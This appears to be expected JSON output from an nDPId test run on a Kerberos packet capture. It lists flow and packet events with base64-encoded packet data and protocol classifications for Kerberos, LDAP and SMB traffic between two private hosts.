+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="} +00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":120,"pkt_l4_len":86,"thread_ts_msec":1549337951639,"pkt":"AAgCHEeupB9ywglqCABFAABqE+JAAIAGfbqsEAgIrBAIyQBYwCVXYI2vkZadzVAYAQBXRgAAQS6YdBRcDlPtUTrjUB8narHoPerU+E0Jfux+IwijhqkO1zkqtUVGrf6H2Py3dE6xzPm7+U9W58\/67z4LH\/YlBX9v"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951709,"flow_last_seen":1549337951709,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1549337951709,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1549337951709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1549337951709,"pkt":"pB9ywglqAAgCHEeuCABFAAEBAR5AAIAGj+esEAjJrBAICMAmAFg7QE\/YI2nTKVAYAQALhgAAZxsOaGFwcHljcmFmdC5vcmelERgPMjAzNzA5MTMwMjQ4MDVapwYCBF3PyFqoEjAQAgESAgERAgEXAgEYAgL\/eaqBljCBk6ADAgESooGLBIGIqYCMNPGCrPeLGO9qPK8YFBfjHxUTb+emA\/ivLTUTYudncy22kbyckKCiSeisUe8yJ84rq8HDegGsl0qK5XKbjnVH8LqImnH6XpTRvHWQpRpTszA\/lJoaM6MWsPPKugansbtAh5mO54t+2+bi3wT01iiQl45hp5bjTN1UEkZf+dFCUo8Xssy7aA=="} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1549337951710,"pkt":"AAgCHEeupB9ywglqCABFAADmE+lAAIAGfTesEAgIrBAIyQBYwCYjadjdO0BQsVAYAQAYcQAA4k0pIk9VQ3WSD8DyjCP6zDplkOu688cj7B+axduw7FbTE6AYUgZjQCgBXNnQmZk8AZkKxd6trQiOV9Q21Ig4\/vSvcG7YJA68j6K63UrdpgCrN\/5os+IHfd01LLYH5NyLiu66hLUPywBQtPqISEBXxfQa4YqqDi7eMFkF+tYnKAJyaEAa5CaoA\/k+JAFpYmNuKBJA\/cZZR\/sXThwZU9vDmuS8WhtIpf+zFLSMTZjUF9FuugxEPjg+p8gxz6TuBQ=="} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952265,"flow_last_seen":1549337952265,"flow_idle_time":7560000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952265,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1549337952265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952265,"pkt":"pB9ywglqAAgCHEeuCABFAADxATFAAIAGj+SsEAjJrBAICMAoAFgO6N+GhTfTAFAYAQDd\/AAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbrRWKgSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYglkZxyflQKWP\/Ais8K06SJm4BPQtT0hjtYpqxsbw8zJYoGM4sYpjZXyTJirO221HZEfk4Zw9eEBLahQpLvN\/C8eKG6Szv5sdWvrvtDno9G1S6IPzDJUqQoaMmLFbqp3TeM2kcY2MDfHhnn2YOkxOZoLnNXNaT+dUxt2+N2MukPguNeobu829zS"} 
+00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952266,"pkt":"AAgCHEeupB9ywglqCABFAADbE\/lAAIAGfTKsEAgIrBAIyQBYwCiFN9i0DujgT1AYAQCK\/QAAiBuHmEFFmc+WsyXKuqx9Swihi4V8obVw5s2sIwUfT4tmX1K8bbM9re\/5e5wllRug+\/LlwLPFO11iuIJBpf\/1q6VzsWXZQ3Uhj6pv9Mvwu3XM\/Kg0OKnhbHwHjTwPH8AFLK9Xs6OvjCpemPsc4QD2yHfZIqmzSgyFffWrBEHUQ0oxARyRw\/cKuJ\/iV+cgVuWHP+LCTlyCV2gs4Zw\/xETck8iUuOpN6dDKbNN8Vw5JmilGwYg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1549337952267,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":368,"pkt_l4_len":334,"thread_ts_msec":1549337952267,"pkt":"pB9ywglqAAgCHEeuCABFAAFiATVAAIAGj2+sEAjJrBAICMAnAYUlT+9+CA99hlAYAQDCQwAAdUvVLNApPEvRYHXzTe8zaxz\/9SHPb\/8TWpCDGqMEAHclvciM0GOY0+pGIhzH\/f\/6jOacNFpBroqFCWgt6TZwWzHkJCgQPX52B1IK52bZg0ONYZDAO1UzroKY+wbOMCsJF8\/BbP9OSbZKzzlfun2r96DSICH7w7yEUFli3VQeP0ogbe+3tFoHFjb+05dbP\/VPGYwLelBDF4MSfNFsp+OMFLmJGy8zQTsDu6jfRxBXMbl8NmKpljCGrvpbK91ZL6OpbzC0zmaE6i4hHgj8sVok02UOBn0gMsv\/uMFl8gfFKRQNU\/cuTbNe+ET9apWENw\/dcLPR6pjmHtriptNJoQ3zVjS2Tc+IkoIqsOQ3cvktrgQFCtQLWZP3pztmcBjhot2oF4ypo07u7Pn3GnXRKfmep\/RhPO\/A8\/McJI0="} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952267,"pkt":"AAgCHEeupB9ywglqCABFAAD6E\/1AAIAGfQ+sEAgIrBAIyQGFwCcID32GJU\/wuFAYAQAMIAAAMIQAAADMAgEPYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1aIGsolL+fu1BeIvW0ck8xNtulprbrU8LwWAQ+0HLcHzxYvBiLYdCRYKwhIeaZIrmfEg+Fmg6VMrCzRHOuCMx3gqqLIgnuXXvz9jtqiRlG1LxGN\/8hm6Dc5JLtY2J2bRsWOZJSU4VCKr7ax6LU"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952273,"flow_last_seen":1549337952273,"flow_idle_time":7560000,"flow_min_l4_payload_len":330,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":330,"midstream":1,"thread_ts_msec":1549337952273,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1549337952273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1549337952273,"pkt":"pB9ywglqAAgCHEeuCABFAAFyATpAAIAGj1qsEAjJrBAICMApAYWiDvrzQ6ao6FAYAQCdKwAA2XkxbZ8llDCRRskO9gczLnFPBBStfBeg8OgSpqEBOAYdhyM5RDqy\/NVC6gFAjMdVRNF4Ud\/vkuMZvi\/C9TPqJBllB8ilyB5vY\/0m8yd5y16xkjvnwbrb\/W3CqgNY3GxQ0p18n9KBChjcbfQi2adBQLNadPsG91L4HVVYSlDxeVsaDj0AMrkXgx+K3pVveifu4IJvdTmm3dssrOx7ri4BqxH9gyHnnJM+gUu5MIG+gLCwhKX1IYuuZbwXmnO9knNSHi2TJaHys\/IKitqKHwvZMTG4i5pUecWz9NSU996q6A\/\/cM86g4TCvpD7370UyqGGHaccTUUMvb5qsoRczG++plTQXQ5YE69in6j\/JeD8IrT\/3QjjRWw+cBkDPh5zGLRzdI7hQfeBq0OXmrV0OXPvzg6Pl4TznRF\/D32Q4zoFws9t5i+mUoUZd\/0N"} 
+00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952274,"pkt":"AAgCHEeupB9ywglqCABFAAD6FAFAAIAGfQusEAgIrBAIyQGFwClDpqjoog78PVAYAQACfgAAMIQAAADMAgETYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1lU8qvBSW6OfUooizc58b3UUWb1Dc9+q1BnNlk6M5gNl0OBLUYfNGeTN7jVmkr5YZr3HGFOATkbw9DVEo286mQ0yhq4w+ZVjlShGexAg6l9M9U7cWsZU11Tj+uS9vWEh6ZGrVD7TgBU6qOlGAU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952280,"flow_last_seen":1549337952280,"flow_idle_time":7560000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952280,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1549337952280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952280,"pkt":"pB9ywglqAAgCHEeuCABFAADxAURAAIAGj9GsEAjJrBAICMArAFh+ue0Nm8k31FAYAQCDOwAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyIagSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYjkLV5w61M4dBZf0U0Cc\/K54wTCl69GxhAdEJKI0gkw0Ve5ZSvbl+6jcyFmUgFhA4RyBx9pGsk\/XqrLuUXPEHyz9XOfuzdWYBvPp5yv4UFPIJKI5TMk\/2fkioL\/XfCG7Jr8xEeBwNw3Qk0PtCp3\/DDaU5\/NbtOzNRQiyiFTx75LpVnwmoKHd6R7"} +00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952281,"pkt":"AAgCHEeupB9ywglqCABFAADbFApAAIAGfSGsEAgIrBAIyQBYwCubyT2Ifrnt1lAYAQDVagAATQg2IahlDr4Do2rw09NPfPwlJMuv1fJJCc5mjToXHNxo9crR1AT1CMr5O+bZxtqN6M9uCaNjeNur9XwIFCnpBuL05RtGDqn2i9hJpKd+E88QIO6v0xwHDv6iGr\/8TVgkK3vs2tcuY57O8+c4l9vRR7jejS5ww2dQZlIjb\/CCYROJuvRqA0LHwqGM0CcXmUposD8ISy568tJuLRICL3GBKJj5gtDiSRwMYGKFzsxgs2+QN48="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAABLAUpAAIAGkHGsEAjJrBAICMAsAFiP2F5aCFrVJ1AYAQB5GAAAR6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyJqgFMAMCARI="} +00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1549337952282,"pkt":"AAgCHEeupB9ywglqCABFAABYFBBAAIAGfZ6sEAgIrBAIyQBYwCwIWtrbj9hefVAYAQDaWgAAkAFNdIHXOvUSiNrRZ37a2E9NpclNBTiyKWuPGcwkWc2OKSpCtzAbfs9v1WRIgz2U"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":356,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00939{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAAGMAVBAAIAGjyqsEAjJrBAICMAqAb0OVvT1RRDYGlAYAP+BiQAAx2oDxasXfLBTEcjz3tABELHnmrS3ZANlrcp\/hNjXtg\/fwYTBDdsdTzX+XDaW+uv3s2\/LBkJPP0K4Dy0YU3CzKo3pfb0515XvBfsBO7Ma0iP8tOV8txynjcFaEQvYkdi2SQ6bebHRRKNuECPHoWmL3h9GQAZAb4a73kOXQ+HdWdMxxkSNni5ZeogFxLOO9R2cL7EvadD9j700FIRXk1Ysly6p8QSOxUcF2BTlCAMMXraIVwnaJn4OFnBRV1kK62QzrTna4Mma6JSVzK\/6fCHORQn+FIHExUVoG3Vq1BveDwHtG0XGyIXhHabrgc6YQttz\/jzBPNDyI9ROMV3pQ0pZrTLzCjs+95mV\/WzyQTG\/SRF7u\/0NE9yZnVgk7HZw7F9bqd7MfX+aga2J6\/HQLbCChYzLyXsDW8WbBsbXh+XIiTyOIboYMLvBqY271GjiVoIyA7mbRvLsykMc7DElauDSPsA2vtc="} 
+00807{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337952283,"pkt":"AAgCHEeupB9ywglqCABFAAEsFBRAAIAGfMasEAgIrBAIyQG9wCpFENgaDlb2WVAYAP9XsAAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABhAAAAAAQAAFesIp3Ms9YkV3HyzmcNx+gJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUXiUY0MYNrse7Xdy+nvFD1NZYMmVWsdodfXY9v69kCk+MLVD1Rqj48zpMQyXFgAZRbdNaLq\/lZFH5cVcwmZOZp6PzJLHFRz2Ys9FBPKwjMkCOL5scijYfadSqIU\/eT7q\/ACDBFzzf8MmsOdu9E="} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 
+00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 
